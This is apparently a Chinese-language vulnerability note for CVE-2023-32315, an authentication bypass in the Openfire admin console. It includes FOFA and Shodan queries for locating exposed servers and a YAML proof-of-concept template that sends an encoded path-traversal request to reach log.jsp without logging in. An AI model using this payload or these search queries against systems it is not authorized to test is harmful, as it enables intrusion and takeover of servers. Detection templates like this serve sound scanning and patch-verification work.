漏洞描述
Openfire是免费的、开源的、基于可拓展通讯和表示协议(XMPP)、采用Java编程语言开发的实时协作服务器。当攻击者可访问Openfire 控制台时,未经身份验证的攻击者可绕过身份认证添加管理员用户,并可进一步执行任意代码,从而控制服务器权限。
FOFA: app="Openfire-管理界面"
SHODAN: title:"openfire"
CVE-2023-32315: Openfire Console authentication bypass
PoC代码[已公开]
id: CVE-2023-32315
info:
name: Openfire Console authentication bypass
author: laohuan12138
severity: high
verified: true
description: |
Openfire是免费的、开源的、基于可拓展通讯和表示协议(XMPP)、采用Java编程语言开发的实时协作服务器。当攻击者可访问Openfire 控制台时,未经身份验证的攻击者可绕过身份认证添加管理员用户,并可进一步执行任意代码,从而控制服务器权限。
FOFA: app="Openfire-管理界面"
SHODAN: title:"openfire"
reference:
- https://github.com/advisories/GHSA-gw42-f939-fhvm
- https://github.com/tangxiaofeng7/CVE-2023-32315-Openfire-Bypass
tags: cve,cve2023,auth-bypass,openfire,console
created: 2023/06/15
set:
hostname: request.url.host
baseurl: request.url
rules:
r0:
request:
raw: |
GET /setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp HTTP/1.1
Host: {{hostname}}
Origin: {{baseurl}}
expression: |
response.status == 200 &&
response.body.bcontains(b'apache') &&
response.body.bcontains(b'java') &&
response.body.bcontains(b'openfire') &&
response.body.bcontains(b'jivesoftware')
expression: r0()